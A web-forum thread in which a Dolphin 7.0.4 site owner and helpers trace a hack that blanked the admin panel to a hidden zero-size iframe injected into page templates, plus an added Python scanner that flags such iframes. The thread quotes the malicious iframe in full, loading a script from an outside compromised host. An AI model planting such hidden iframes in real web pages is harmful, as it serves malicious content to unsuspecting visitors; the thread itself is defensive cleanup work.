Dolphin 7.0.4, my site was hacked and now when my admin profile clicks the crown icon on the member menu it changes to a blank screen. Mousing over the icon I see a popup with the words "Go in admin panel", the status bar says I am going to http://eastwestlove.com/administration/ and that's where the address bar at the top of the browser ends up, but the page is blank.
I suspect the hacker was trying to hijack my site to do his advertising on the banner system of my site, and wanted to keep me from accessing the admin panel so I couldn't change it back. Anyway the database doesn't seem to contain any banners that I didn't put there, but he could have deleted a file or corrupted something as he was trying to incorporate his code into one of my pages.
I have done a lot of searching to try to find the code that actually displays the admin dashboard. I found a lot that composes the page, but not the part that does the display.
Any advice on where to find that code?
Cheers.
|
Your body is set to display: none; with an iframe in it. You need to check your administration/templates/base/_sub_header.html for this code
<iframe width="0" height="0" style="display:none;" id="frmchkldver" src="removed;wrk=24"
oh and scan your system with a good antivirus, change all passwords and maybe scan your whole files on the server too
so much to do.... |
Thanks for your help.
Checked that file and no sign of any iframes. Also compared it with a version from a couple of years ago and there were no differences. In fact no files in that folder had been changed for about 2 years.
|
er.....i meant _header.html not _sub_header.html. sorry
and if the file is intact try removing this temporarily, just to see if that fixes it.
<body <bx_injection:injection_body /> >
so much to do.... |
you are definitely on the right track. I just did a source code enquiry on the blank page and it contains the whole 700 lines of page code with this iframe
<iframe width="0" height="0" style="display:none;" id="frmchkldver" src="http://stemcellnaturaltherapy.com/images/header.php?ftd=4950638&path=%7cpublic_html%7cadministration%7ctemplates%7cbase%7c&sys=UN&wrk=24"></iframe>
in the body code where you were talking about. Next question is where is the code composed that the section <bx_injection:injection_body /> is referring to, because I expect that that is where the hacker put his code.
|
It's in the database.
Go to phpmyadmin->sys_injections and search for key column for "injection_body"
Now, if he added that from database then you need to change your pass cuz i think someone accessed your account on server. Oh it's scary
so much to do.... |
just checked db. there is no key column for "injection_body" in the sys_injections table. Is it critical and should I write it in? and what should it say.
On another note, it seems that the iframe has been hard coded. Do you know where is the code that calls the database looking for the injection_body?
|
If it's not in database then it has to be in that file. Can you attach the _header.html file here?
EDIT: Oh and maybe a screenshot of the sys_injection table too :D
so much to do.... |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<title>__page_header__</title>
<meta http-equiv="Content-Type" content="text/html; charset=__page_charset__" />
<bx_include_css />
<bx_include_js />
__dol_images__
__dol_lang__
__dol_options__
<script defer type="text/javascript">
var site_url = '<bx_url_root />';
var aUserInfoTimers = new Array();
var glUserInfoDisabled = 'yes';
$(document).ready( function() {
$( 'div.RSSAggrCont' ).dolRSSFeed();
} );
</script>
<!--[if lt IE 7.]>
<script defer type="text/javascript" src="../inc/js/pngfix.js"></script>
<![endif]-->
__extra_js__
<bx_injection:injection_head />
</head>
<body <bx_injection:injection_body /> >
<bx_injection:injection_header />
<div id="FloatDesc"></div>
|
SQL result
Host: localhost
Database: eastwes1_dol
Generation Time: Mar 20, 2013 at 09:20 AM
Generated by: phpMyAdmin 3.4.11.1 / MySQL 5.1.65-cll
SQL query: SELECT * FROM `sys_injections` LIMIT 0, 30 ;
Rows: 5

| id | name | page_index | key | type | data | replace | active |
|---|---|---|---|---|---|---|---|
| 1 | flash_integration | 0 | injection_header | php | return getRayIntegrationJS(true); | 0 | 1 |
| 3 | banner_bottom | 0 | banner_bottom | php | return banner_put_nv(4); | 0 | 1 |
| 4 | banner_right | 0 | banner_right | php | return banner_put_nv(3); | 0 | 1 |
| 5 | banner_top | 0 | banner_top | php | return banner_put_nv(1); | 0 | 1 |
| 6 | banner_left | 0 | banner_left | php | return banner_put_nv(2); | 0 | 1 |
|
This is very strange....need to think how the iframe is added there, in the meanwhile run scans and change passwords
so much to do.... |
something ate part of my dashboard in admin years ago!
MY SITES http://viptopia.net general social networking | http://www.rangerschat.com/ niche site |
LMAO Tommy we know about that for a long time.
so much to do.... |
LMAO Tommy we know about that for a long time.
lol i said "years" ago lol!!
MY SITES http://viptopia.net general social networking | http://www.rangerschat.com/ niche site |
And i said "long" time ago :P
lol i said "years" ago lol!!
so much to do.... |
Hey, try this: download all the files from your server and download this http://www.fileseek.ca/Download/ and run a search for the string "frmchkldver".
so much to do.... |
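The file search suggested above, as an added example that is not part of the thread: a Python sketch that walks a downloaded copy of the site and flags zero-sized or hidden iframes as well as any other occurrence of the `frmchkldver` id. The extension list, the sample markup and the placeholder hosts are assumptions made for the example.

```python
import os
import re
from urllib.parse import urlparse

MARKER = "frmchkldver"  # iframe id quoted in the thread
IFRAME_RE = re.compile(r"<\s*iframe\b[^>]*>", re.IGNORECASE)
ATTR_RE = re.compile(r"""([\w:-]+)\s*=\s*(["'])(.*?)\2""", re.DOTALL)
WEB_EXT = {".php", ".html", ".htm", ".js", ".tpl", ".inc"}  # assumed list

# Constructed sample: template body with an injected tag (placeholder hosts).
SAMPLE = (
    "<body <bx_injection:injection_body /> >\n"
    '<iframe width="0" height="0" style="display:none;" id="frmchkldver" '
    'src="http://injected.example/header.php?wrk=24"></iframe>\n'
    '<iframe width="560" height="315" src="https://video.example/e/1"></iframe>\n'
)

def is_hidden(attrs):
    """True for a zero-sized or CSS-hidden iframe."""
    style = attrs.get("style", "").replace(" ", "").lower()
    zero = any(attrs.get(k, "").strip() in ("0", "0px") for k in ("width", "height"))
    return zero or "display:none" in style or "visibility:hidden" in style

def scan_text(text):
    """Return sorted (line, reason, src_host) hits for one file's contents."""
    hits, covered = [], []
    for m in IFRAME_RE.finditer(text):
        attrs = {k.lower(): v for k, _, v in ATTR_RE.findall(m.group(0))}
        if is_hidden(attrs) or attrs.get("id") == MARKER:
            host = urlparse(attrs.get("src", "")).netloc
            hits.append((text.count("\n", 0, m.start()) + 1, "hidden-iframe", host))
            covered.append(m.span())
    for m in re.finditer(MARKER, text):  # marker outside any flagged tag
        if not any(a <= m.start() < b for a, b in covered):
            hits.append((text.count("\n", 0, m.start()) + 1, "marker-string", ""))
    return sorted(hits)

def scan_tree(root):
    """Map relative path -> hits for every web-type file under root."""
    report = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            if os.path.splitext(name)[1].lower() in WEB_EXT:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_text(fh.read())
                if hits:
                    report[os.path.relpath(path, root)] = hits
    return report
```

A literal search like this only finds the tag where it is stored as plain text; code that assembles the markup at runtime from encoded pieces will not match, so an empty report does not clear the file set.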
Try looking in the file inc/classes/BxDolTemplate.php
https://www.deanbassett.com |
|
ok shanky mr genius beings you are now the dashboard king... please tell me what happened to mine!??!
MY SITES http://viptopia.net general social networking | http://www.rangerschat.com/ niche site |
ok shanky mr genius beings you are now the dashboard king... please tell me what happened to mine!??!
LMAO
ManOfTeal.COM a Proud UNA site, six years running strong! |